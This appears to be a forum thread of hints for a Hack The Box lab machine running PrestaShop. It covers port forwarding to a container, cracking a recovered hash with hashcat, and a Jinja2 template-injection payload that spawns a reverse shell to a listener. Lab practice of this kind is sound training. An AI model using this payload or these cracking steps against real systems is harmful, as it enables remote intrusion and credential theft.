where can I get the PrestaShop version?
Open the admin panel; you will see the version on the login page
Really interesting one. I am stuck at the connect to container though. My sshuttle worked one time and that was it. Any hint how to connect to the docker? I did find the IP of the docker. Not sure how to connect to it now
me too. exploit.py only returns sometimes 404, sometimes 403. http server "GET 200", but no shell returns
I just use the normal ssh binary for port forwarding and then leave that running
disregard - I managed, thx
If you’d see that, then your payload is incorrect.
Try this
listen_ip="your_ip"
listen_port=9003
print(f"""
{{% for x in ().__class__.__base__.__subclasses__() %}}
{{% if "warning" in x.__name__ %}}
{{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}
{{% endif %}}
{{% endfor %}}
""")
I think it was either the new lines or the tabs that messed up my payload. All else was ok. Testing around now to figure it out
btw thank you for your help @dannyk
did u find the hash?
in hindsight, my issue was not the payload but that URL in general and the Notification URL List both need to be set to something legitimate that you have… meaning some server you stand up for this exploit. I just always had them mismatched
hope this helps someone else
guys, how did u crack the hash?
I am not able to crack the hash
hashcat, put the hash in a file and crack it with rockyou. Check your mode and make sure it matches
I tried with mode 100 but no results
the hash you should be cracking starts with a $
either you are cracking something else or do not have the whole thing
edit: it's not -m 100
with the hash is anything on http://shop.trickster.htb/.git/refs/heads/admin_panel so yeah I tried many times with different wordlists but with no success
oh good, thanks bro, where can I find this hash?
I know some folks keep looking at the .git folder - but I did not use that at all
to find the user hash, try the mysql db
the index file is a file link how who could read a file link?
help me bro, I am stuck finding the hash for like 2 days